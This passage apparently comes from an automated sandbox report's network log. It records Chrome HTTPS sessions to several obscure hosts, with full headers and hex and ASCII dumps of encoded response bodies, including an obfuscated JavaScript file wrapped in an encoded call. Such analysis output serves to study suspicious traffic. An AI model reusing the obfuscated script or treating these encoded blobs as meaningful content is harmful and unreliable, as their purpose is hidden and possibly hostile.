                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 62 7a 51 48 48 41 39 38 56 41 6a 45 61 66 67 5a 6c 53 65 4e 59 62 34 36 4e 50 67 4c 47 69 51 44 39 77 6f 48 43 67 6b 50 67 2f 63 51 51 68 41 50 6c 7a 76 65 43 58 62 2f 4c 32 4f 74 45 42 79 62 31 47 36 73 41 30 79 30 53 63 39 67 33 32 48 79 66 59 35 69 39 75 7a 62 61 42 46 4d 66 54 48 59 57 52 41 55 30 35 2b 42 49 57 38 2f 6e 71 77 48 43 59 39 79 6e 71 74 67 6e 2b 75 36 74 53 68 30 43 65 6f 77 58 46 6a 77 47 4e 76 79 6e 66 4b 74 31 75 63 6b 66 31 75 6e 43 71 30 48 46 31 4d 41 4f 2f 48 32 2b 78 52 71 67 46 68 72 43 48 42 36 35 4d 6c 4b 47 30 70 43 30 6b 48 62 35 4e 50 74 48 4d 75 48 73 50 77 45 4d 35 70 4c 33 4b 6f 52 6d 4a 47 78 34 45 57 76 35 70 6b 4f 53 49 34 61 72 7a 52 43 42 52 31 6d 76 74 57 30 48 41 7a 6e 6d 76 68 55 6a 64 6c 4b 63 72 6d 78 4d 72 5a
                                                                                                                                                          Data Ascii: bzQHHA98VAjEafgZlSeNYb46NPgLGiQD9woHCgkPg/cQQhAPlzveCXb/L2OtEByb1G6sA0y0Sc9g32HyfY5i9uzbaBFMfTHYWRAU05+BIW8/nqwHCY9ynqtgn+u6tSh0CeowXFjwGNvynfKt1uckf1unCq0HF1MAO/H2+xRqgFhrCHB65MlKG0pC0kHb5NPtHMuHsPwEM5pL3KoRmJGx4EWv5pkOSI4arzRCBR1mvtW0HAznmvhUjdlKcrmxMrZ
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 43 71 69 66 44 43 71 49 45 42 63 71 6a 4a 44 76 41 45 56 56 7a 34 6d 6c 53 73 72 66 6c 58 69 71 4e 6c 62 37 45 67 56 54 73 71 39 6c 5a 53 52 4e 69 55 63 72 49 56 64 43 71 66 4a 6f 66 41 39 4f 4c 45 42 71 32 45 67 42 79 30 46 6e 73 65 41 44 32 78 4e 51 50 43 71 39 4a 4c 63 72 78 6c 51 38 72 65 6c 65 69 72 42 6c 58 49 64 38 6a 75 64 51 42 63 74 38 71 47 56 58 38 72 6d 56 53 2f 5a 43 56 53 43 71 4f 56 62 67 41 75 56 53 63 72 79 56 62 79 72 2b 56 59 4b 72 68 56 52 6d 42 52 56 53 67 42 78 56 66 68 31 61 56 55 69 72 57 71 69 69 71 5a 56 5a 4d 71 35 56 5a 69 72 72 30 4f 54 34 66 6c 57 71 71 41 56 53 79 72 4e 56 65 79 71 35 54 44 71 71 49 56 58 71 71 7a 6c 5a 53 72 44 56 56 4e 78 6a 56 61 61 72 7a 56 54 53 72 4a 56 58 53 71 63 56 59 79 72 31 6c 61 36 71 4e 56 63
                                                                                                                                                          Data Ascii: CqifDCqIEBcqjJDvAEVVz4mlSsrflXiqNlb7EgVTsq9lZSRNiUcrIVdCqfJofA9OLEBq2EgBy0FnseAD2xNQPCq9JLcrxlQ8releirBlXId8judQBct8qGVX8rmVS/ZCVSCqOVbgAuVScryVbyr+VYKrhVRmBRVSgBxVfh1aVUirWqiiqZVZMq5VZirr0OT4flWqqAVSyrNVeyq5TDqqIVXqqzlZSrDVVNxjVaarzVTSrJVXSqcVYyr1la6qNVc
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 78 51 68 76 48 57 41 53 30 71 2f 49 44 6d 4d 58 77 36 42 44 72 4c 76 55 67 6c 75 58 55 68 35 51 70 47 68 4f 77 6c 55 48 54 55 31 30 6e 70 63 30 44 61 4d 4e 4a 68 76 31 44 73 46 6a 66 57 6e 74 32 72 51 61 70 5a 30 34 38 47 4d 57 68 70 46 5a 50 7a 36 4c 62 72 56 6d 4c 59 34 4e 70 58 61 64 4c 52 50 78 69 6b 73 37 48 37 36 43 79 32 33 4c 34 62 49 4c 39 62 37 5a 32 37 45 6d 73 66 56 41 35 59 4f 37 2b 6f 63 35 41 50 68 4e 49 6a 66 58 54 52 62 78 58 66 36 31 39 33 5a 31 54 46 58 64 69 41 57 4b 31 4a 4d 4f 6a 56 54 62 75 55 73 4a 62 56 33 62 65 37 64 33 61 48 4c 35 58 5a 41 41 54 33 61 33 45 37 58 64 48 4c 50 4c 65 73 72 4f 71 66 67 78 78 65 69 30 37 6a 76 43 33 49 75 48 46 6b 41 37 7a 69 61 2b 4d 50 64 63 72 6f 56 64 45 42 78 65 67 43 51 59 79 57 38 49 38 4c 6e
                                                                                                                                                          Data Ascii: xQhvHWAS0q/IDmMXw6BDrLvUgluXUh5QpGhOwlUHTU10npc0DaMNJhv1DsFjfWnt2rQapZ048GMWhpFZPz6LbrVmLY4NpXadLRPxiks7H76Cy23L4bIL9b7Z27EmsfVA5YO7+oc5APhNIjfXTRbxXf6193Z1TFXdiAWK1JMOjVTbuUsJbV3be7d3aHL5XZAAT3a3E7XdHLPLesrOqfgxxei07jvC3IuHFkA7zia+MPdcroVdEBxegCQYyW8I8Ln
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 32 75 33 57 47 32 6a 4e 4f 71 70 6f 78 2f 75 6d 2f 6f 37 4a 79 48 4c 6c 57 77 75 42 4a 66 48 50 67 53 6a 38 45 31 67 4d 30 6f 4b 4b 4a 68 67 44 34 34 6c 32 41 51 66 4d 42 63 64 65 43 72 51 63 4b 75 42 2b 45 66 67 4d 4c 6d 45 4e 53 43 34 57 70 67 52 79 36 66 6f 54 50 79 6f 51 68 67 48 42 66 68 42 65 41 39 77 47 35 55 48 76 51 55 6f 50 31 2b 73 32 47 6e 63 46 65 43 35 63 46 57 47 4a 58 42 32 6b 44 50 6f 63 66 68 48 53 6a 76 6f 55 50 42 57 63 79 75 72 50 45 63 72 46 52 67 45 57 6a 68 66 66 62 63 59 57 4b 4d 2f 65 45 57 49 53 59 67 66 37 72 7a 34 56 53 67 50 57 47 44 70 72 51 73 64 2b 46 62 34 55 69 36 53 66 6f 59 45 59 2b 68 38 33 49 39 77 66 6b 63 32 75 79 6b 48 4f 48 42 72 72 79 70 77 53 78 51 54 6e 6a 43 59 64 44 41 59 2f 62 64 76 4c 54 4d 55 6d 46 6f 34
                                                                                                                                                          Data Ascii: 2u3WG2jNOqpox/um/o7JyHLlWwuBJfHPgSj8E1gM0oKKJhgD44l2AQfMBcdeCrQcKuB+EfgMLmENSC4WpgRy6foTPyoQhgHBfhBeA9wG5UHvQUoP1+s2GncFeC5cFWGJXB2kDPocfhHSjvoUPBWcyurPEcrFRgEWjhffbcYWKM/eEWISYgf7rz4VSgPWGDprQsd+Fb4Ui6SfoYEY+h83I9wfkc2uykHOHBrrypwSxQTnjCYdDAY/bdvLTMUmFo4
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 33 68 6a 48 6c 55 32 5a 39 5a 33 48 6e 44 36 53 47 35 41 6e 6c 6a 77 4f 71 30 37 68 6e 43 2b 59 30 71 35 39 4b 61 58 44 4b 79 45 72 6b 48 48 72 50 5a 75 4d 6f 70 50 45 68 38 70 41 44 64 59 43 66 35 62 71 78 49 66 4d 2b 6b 71 5a 46 74 70 50 45 63 2f 46 6d 72 2b 63 78 35 36 2f 6b 5a 2b 56 6e 35 57 2f 6e 73 75 49 41 4f 63 69 6f 6c 63 4c 31 63 31 2f 6d 6e 2b 56 2f 35 46 2f 6c 44 41 46 66 35 6c 2f 6e 78 48 43 37 70 38 4d 44 33 2b 56 78 35 4a 4c 6d 45 38 55 36 75 4c 42 6a 67 71 4c 39 34 4f 50 6e 66 2b 48 77 6f 61 71 4c 59 79 4b 64 78 32 57 51 74 36 65 66 35 70 33 48 6a 70 44 6a 34 31 2f 6d 32 47 4b 64 78 53 57 52 31 45 4e 66 35 4a 33 47 55 4b 4d 2b 6b 72 52 44 51 79 76 73 49 37 41 43 5a 41 48 62 41 33 4f 46 69 67 6d 56 35 30 34 43 66 42 49 62 35 66 48 42 5a 7a
                                                                                                                                                          Data Ascii: 3hjHlU2Z9Z3HnD6SG5AnljwOq07hnC+Y0q59KaXDKyErkHHrPZuMopPEh8pADdYCf5bqxIfM+kqZFtpPEc/Fmr+cx56/kZ+Vn5W/nsuIAOciolcL1c1/mn+V/5F/lDAFf5l/nxHC7p8MD3+Vx5JLmE8U6uLBjgqL94OPnf+HwoaqLYyKdx2WQt6ef5p3HjpDj41/m2GKdxSWR1ENf5J3GUKM+krRDQyvsI7ACZAHbA3OFigmV504CfBIb5fHBZz
                                                                                                                                                          2024-06-09 22:41:11 UTC12596INData Raw: 4e 74 72 65 31 56 62 59 50 74 6c 32 31 79 31 52 54 74 58 4f 32 52 51 4a 4f 74 6c 46 56 6b 37 58 72 56 71 2b 31 73 72 64 46 41 47 2b 33 56 68 56 76 74 39 74 58 53 72 64 4b 77 61 2b 30 63 72 64 62 74 6d 2b 33 4c 37 57 31 56 6a 75 32 55 37 66 31 74 62 36 30 49 72 52 66 74 59 57 31 44 39 5a 6c 74 68 4f 30 59 37 5a 68 4a 2b 2b 31 47 32 41 78 74 44 35 57 6f 37 64 75 74 43 36 31 37 72 53 6c 55 73 57 32 55 56 62 6a 74 6c 32 33 52 37 51 4b 74 52 4d 6b 79 62 66 65 55 37 2b 33 30 6c 4f 37 74 53 65 33 57 73 71 35 74 4f 5a 56 50 62 5a 78 74 51 57 32 57 62 66 41 47 39 2b 33 56 68 59 6a 74 4d 42 30 70 37 66 74 59 50 5a 56 53 62 52 6e 74 2b 61 32 79 62 57 66 74 48 65 30 34 31 70 50 74 2f 71 30 59 48 58 41 64 39 69 33 50 5a 49 46 74 4e 2b 30 59 37 57 57 4a 6b 42 33 45 48
                                                                                                                                                          Data Ascii: Ntre1VbYPtl21y1RTtXO2RQJOtlFVk7XrVq+1srdFAG+3VhVvt9tXSrdKwa+0crdbtm+3L7W1Vju2U7f1tb60IrRftYW1D9ZlthO0Y7ZhJ++1G2AxtD5Wo7dutC617rSlUsW2UVbjtl23R7QKtRMkybfeU7+30lO7tSe3Wsq5tOZVPbZxtQW2WbfAG9+3VhYjtMB0p7ftYPZVSbRnt+a2ybWftHe041pPt/q0YHXAd9i3PZIFtN+0Y7WWJkB3EH


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          369192.168.2.55013823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC404OUTGET /fiximg/ac-20200404/fileupload/uy09/202307/202307200237350.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC554INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 2220
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE25[4],EU-FRA-paris-GLOBAL1-CACHE17[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464739
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 8d7693e354de3f767f9be6a508b0c149
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127261
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC2220INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 33 69 36 78 44 54 79 76 47 31 53 46 6e 38 31 37 74 31 36 34 4e 6d 2b 65 4d 36 73 79 71 35 6b 39 41 4f 32 39 4c 51 63 31 53 32 42 4c 59 77 47 49 75 35 58 51 32 77 34 34 30 4b 47 4a 7a 46 4a 39 43 39 55 54 45 49 35 38 76 46 35 6d 52 54 79 63 61 4a 57 4c 6b 62 36 6e 4c 35 37 4d 61 7a 43 44 52 51 49 50 62 47 4f 32 68 41 64 59 47 75 71 61 7a 78 6f 47 73 64 67 46 65 6a 6d 2b 6a 4b 6e 2f 74 4f 77 6a 6f 64 6d 6d 31 6f 50 32 78 6c 37 36 46 59 7a 44 72 45 2f 33 78 76 73 62 51 34 78 45 41 37 73 6c 41 61 4e 48 72 67 41 79 43 38 42 4a 6f 47 34 71 70 52 6c 49 4b 42 4b 34 57 39 36 31 41 66 51 67 41 36 75 41 74 50 4c 30 59 2b 4f 36 30 34 35 4b 50
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164Nm+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkb6nL57MazCDRQIPbGO2hAdYGuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          370192.168.2.55013990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC539OUTGET /pc/240516-03/static/js/t4043.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC645INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 78520
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:35 GMT
                                                                                                                                                          ETag: "6645cb6f-132b8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE9[459],EU-GER-frankfurt-GLOBAL1-CACHE11[415,TCP_MISS,457],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 293010ebce3c922f1112e6c46e9f5c81
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1993407
                                                                                                                                                          X-CCDN-Expires: 598594
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC15739INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 6e 77 48 59 41 61 66 41 54 67 41 59 42 64 45 67 62 77 43 49 42 71 41 44 69 59 47 59 47 41 75 41 4d 77 46 63 30 4d 41 43 34 42 4c 64 4a 69 45 6b 51 4a 45 51 45 6f 36 41 4e 79 67 41 6e 41 41 51 6f 41 33 43 67 43 38 2f 51 61 50 48 79 47 66 4a 43 46 56 49 68 79 6b 63 49 59 61 6c 61 79 53 47 31 30 30 55 41 4c 59 67 75 44 41 46 34 41 4c 41 50 6f 41 77 67 42 79 44 43 51 65 53 45 68 51 41 4f 59 67 53 46 78 30 55 44 78 43 49 4d 71 38 41 73 4a 69 61 42 4a 53 38 73 6f 67 51 6e 7a 4b 61 41 79 71 7a 45 4a 4d 44 49 43 6a 2b 6f 44 65 47 59 41 55 36 73 77 67 32 44 53 56 67 4e 4a 79 67 48 41 71 44 41 43 2b 4a 46 41 41 4e 68 43 2b 55 50 34 41 4a 6c 42
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJnwHYAafATgAYBdEgbwCIBqADiYGYGAuAMwFc0MAC4BLdJiEkQJEQEo6ANygAnAAQoA3CgC8/QaPHyGfJCFVIhykcIYalaySG100UALYguDAF4ALAPoAwgByDCQeSEhQAOYgSFx0UDxCIMq8AsJiaBJS8sogQnzKaAyqzEJMDICj+oDeGYAU6swg2DSVgNJygHAqDAC+JFAANhC+UP4AJlB
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 6b 70 71 4f 33 64 61 44 4b 67 52 58 50 45 39 50 4c 69 77 55 50 74 33 54 4a 30 34 74 79 65 75 6e 38 6e 6c 53 33 44 35 70 58 77 2b 6e 6d 69 50 4f 6a 45 6a 35 61 2f 78 36 59 53 50 41 47 7a 33 38 35 52 36 55 39 63 62 53 76 49 41 44 7a 36 2b 31 72 66 36 37 4e 50 55 46 6e 54 30 32 37 64 4c 65 41 44 50 69 46 38 68 4a 70 42 49 44 69 77 7a 50 30 2b 65 69 39 50 42 59 41 4a 57 50 64 6e 37 49 43 7a 6c 6c 5a 73 73 77 59 41 57 56 71 41 4f 35 78 48 63 45 58 2f 41 6a 6e 35 73 78 57 55 38 74 2f 44 45 37 76 63 46 41 48 56 34 48 54 71 32 63 62 41 4e 6c 61 7a 4c 62 2b 76 41 42 42 4f 4f 61 57 33 54 38 4b 50 75 41 7a 54 79 6a 37 46 4c 78 5a 6f 68 73 46 4b 47 65 75 35 72 4c 77 65 65 33 50 48 6e 61 6c 2b 58 6f 51 4d 52 36 57 66 47 75 47 41 4a 45 6c 41 4f 56 34 4e 55 69 65 51 33
                                                                                                                                                          Data Ascii: kpqO3daDKgRXPE9PLiwUPt3TJ04tyeun8nlS3D5pXw+nmiPOjEj5a/x6YSPAGz385R6U9cbSvIADz6+1rf67NPUFnT027dLeADPiF8hJpBIDiwzP0+ei9PBYAJWPdn7ICzllZsswYAWVqAO5xHcEX/Ajn5sxWU8t/DE7vcFAHV4HTq2cbANlazLb+vABBOOaW3T8KPuAzTyj7FLxZohsFKGeu5rLwee3PHnal+XoQMR6WfGuGAJElAOV4NUieQ3
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 79 48 73 58 54 35 38 2b 48 75 51 56 35 79 74 66 4e 51 41 4b 41 48 37 42 49 51 66 41 48 53 67 37 77 67 61 6e 48 73 54 56 6a 38 34 6e 73 67 54 4d 43 53 6e 73 79 39 43 43 64 4b 4e 75 31 64 34 79 70 6e 74 46 76 53 57 54 6e 39 48 4d 41 47 59 33 55 4a 47 34 39 50 30 70 4e 37 53 35 70 6e 41 70 58 57 55 42 31 76 46 51 53 55 79 58 34 70 75 48 54 62 31 4b 4a 68 76 61 7a 5a 31 4c 58 65 31 2f 4d 36 44 41 52 5a 48 57 65 70 39 53 53 48 32 53 5a 46 36 57 51 76 39 5a 53 31 6a 42 50 41 44 75 57 54 79 6b 45 48 4c 75 51 4c 6b 45 48 37 76 70 59 62 6e 35 64 4f 63 61 6b 54 4e 2b 2b 39 44 6d 36 31 6f 52 36 74 6c 4b 62 43 30 32 6f 6e 6e 46 33 39 65 79 6b 4b 6c 6c 70 66 67 73 5a 35 45 4f 56 2b 33 6f 35 68 73 2f 30 31 78 6c 67 2f 66 39 6c 6d 4e 43 68 59 71 31 2f 70 36 5a 54 30 50
                                                                                                                                                          Data Ascii: yHsXT58+HuQV5ytfNQAKAH7BIQfAHSg7wganHsTVj84nsgTMCSnsy9CCdKNu1d4ypntFvSWTn9HMAGY3UJG49P0pN7S5pnApXWUB1vFQSUyX4puHTb1KJhvazZ1LXe1/M6DARZHWep9SSH2SZF6WQv9ZS1jBPADuWTykEHLuQLkEH7vpYbn5dOcakTN++9Dm61oR6tlKbC02onnF39eykKllpfgsZ5EOV+3o5hs/01xlg/f9lmNChYq1/p6ZT0P
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 54 68 44 72 76 30 34 78 71 2f 38 30 69 75 58 6c 59 53 6e 30 42 33 57 68 65 31 56 68 5a 37 69 6d 63 6d 53 56 43 79 61 6d 55 4e 70 74 74 74 39 50 74 72 73 4b 4b 75 5a 73 57 69 55 64 4c 69 46 61 53 7a 4d 46 51 53 56 73 46 62 4e 68 4e 30 64 63 31 75 72 71 46 44 36 34 53 47 56 75 70 71 30 4c 38 34 59 47 55 77 71 52 2f 4c 57 59 4f 66 4c 42 6b 62 68 79 63 73 43 59 42 48 63 45 2f 4c 44 69 64 75 53 6f 79 51 2b 73 4f 49 65 49 6b 4d 6d 51 2b 74 6f 59 43 57 6a 53 78 75 49 72 59 4e 73 32 56 63 30 73 4e 63 62 6b 72 6d 6b 4b 41 45 49 41 6d 30 6c 63 74 79 49 66 75 53 69 34 51 55 51 5a 46 61 63 6b 46 66 76 48 6c 32 4c 6e 6e 31 4e 70 6b 51 42 31 46 54 70 44 44 46 57 73 6b 70 46 54 34 6b 57 78 74 53 4d 54 46 5a 4f 42 6f 59 44 71 4d 54 46 59 39 6a 69 45 55 6f 71 65 48 68 59
                                                                                                                                                          Data Ascii: ThDrv04xq/80iuXlYSn0B3Whe1VhZ7imcmSVCyamUNpttt9PtrsKKuZsWiUdLiFaSzMFQSVsFbNhN0dc1urqFD64SGVupq0L84YGUwqR/LWYOfLBkbhycsCYBHcE/LDiduSoyQ+sOIeIkMmQ+toYCWjSxuIrYNs2Vc0sNcbkrmkKAEIAm0lctyIfuSi4QUQZFackFfvHl2Lnn1NpkQB1FTpDDFWskpFT4kWxtSMTFZOBoYDqMTFY9jiEUoqeHhY
                                                                                                                                                          2024-06-09 22:41:11 UTC13629INData Raw: 75 78 4a 32 6d 73 34 4f 6d 32 4f 33 79 5a 70 51 70 55 50 2f 30 46 4e 77 2b 75 37 47 4d 42 31 56 4e 33 77 41 31 4e 35 57 41 79 77 4e 4a 76 38 77 64 75 4e 54 31 32 52 73 47 42 7a 4a 73 51 74 70 70 6a 70 52 6e 52 50 69 75 38 37 68 78 55 50 32 4d 38 4a 38 52 69 2b 59 49 35 75 6b 74 6a 67 4d 76 52 48 4a 42 33 78 46 43 54 4e 5a 38 70 74 66 4e 2b 57 74 73 6d 54 77 4e 79 74 72 52 51 41 49 55 4a 75 6c 69 49 46 76 45 46 6c 64 30 50 42 6e 52 6a 66 6b 56 43 77 56 59 52 45 4e 52 71 51 5a 6a 51 42 69 63 75 6a 65 4b 63 76 41 78 72 4a 73 68 6b 64 4a 50 76 47 41 52 41 77 36 59 75 76 64 32 6e 47 73 6f 41 62 6a 33 39 56 74 57 52 52 77 4c 39 73 36 41 52 50 51 77 4d 4c 66 4e 38 4b 55 32 52 51 65 45 7a 53 6d 45 4d 56 4d 50 52 71 32 53 77 69 4c 67 44 53 34 55 77 41 58 52 57 48
                                                                                                                                                          Data Ascii: uxJ2ms4Om2O3yZpQpUP/0FNw+u7GMB1VN3wA1N5WAywNJv8wduNT12RsGBzJsQtppjpRnRPiu87hxUP2M8J8Ri+YI5uktjgMvRHJB3xFCTNZ8ptfN+WtsmTwNytrRQAIUJuliIFvEFld0PBnRjfkVCwVYRENRqQZjQBicujeKcvAxrJshkdJPvGARAw6Yuvd2nGsoAbj39VtWRRwL9s6ARPQwMLfN8KU2RQeEzSmEMVMPRq2SwiLgDS4UwAXRWH


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          371192.168.2.55014023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC362OUTGET /cc.png?r=3717168674 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC573INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[227],EU-GER-frankfurt-EDGE4-CACHE1[13,TCP_MISS,225],EU-FRA-paris-GLOBAL1-CACHE17[4],EU-FRA-paris-GLOBAL1-CACHE2[0,TCP_HIT,0],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 193cf376d8292d992c20062d35ef4e46
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          372192.168.2.550126103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC668OUTPOST /zb-cloud/pwv/sn.settings.get HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 484
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
